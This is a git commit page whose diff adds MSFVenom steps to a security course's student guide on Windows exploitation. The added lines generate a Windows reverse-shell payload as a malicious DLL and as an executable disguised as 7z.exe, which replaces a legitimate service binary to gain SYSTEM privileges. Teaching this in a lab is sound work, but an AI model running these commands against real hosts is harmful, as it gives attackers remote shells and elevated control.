Merge branch 'rocky.z.wilson-master-patch-27459' into 'master'

Adding MSFVenom Solutions to Student Guide See merge request sec/public!65

Merge branch 'rocky.z.wilson-master-patch-27459' into 'master'
Adding MSFVenom Solutions to Student Guide See merge request sec/public!65
03cffc0f · Bryan Gagne · 0a18cd83 · 2fb0d130 · 03cffc0f
Commit 03cffc0f authored 3 years ago by Bryan Gagne
--- a/security/modules/lessons/pages/lesson-9-windows-exploit_sg.adoc
+++ b/security/modules/lessons/pages/lesson-9-windows-exploit_sg.adoc
@@ -377,6 +377,9 @@ BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)

 Once the malicious dll has been createdit must be uploaded to the host. Use scp, ftp, nc, python simple HTTP server, or copying and pasting base64 dump of file.

+. Alternative method for DLL creation using MSFVenom
+* ``msfvenom -p windows/shell_reverse_tcp LHOST=10.50.x.x LPORT=4444 -f dll > bad.dll``
+
 *Transfering the DLL* +
 Once the malicious dll has been created, it must be uploaded to the host. Use of ``scp``, ``ftp``, ``nc``, ``python simple HTTP server``, or ``copying base64 output``.

@@ -452,6 +455,8 @@ NOTE: We are interested in binaries running as *SYSTEM* in locations where *BUIL
 *Exploiting a vulnerable Service* +
 The overall intent is to replace the legitimate service with an executable that will allow an attacker to accomplish their objective.

+. (Optional) Create a malicious executable file via MSFVenom
+*`` msfvenom -p windows/shell_reverse_tcp LHOST=10.50.x.x LPORT=4444 -f exe > 7z.exe
 . Create a backup copy of 7z.exe
 * `` copy 7z.exe 7z.blk.exe``
 . Copy a malicious executable into 7z.exe old location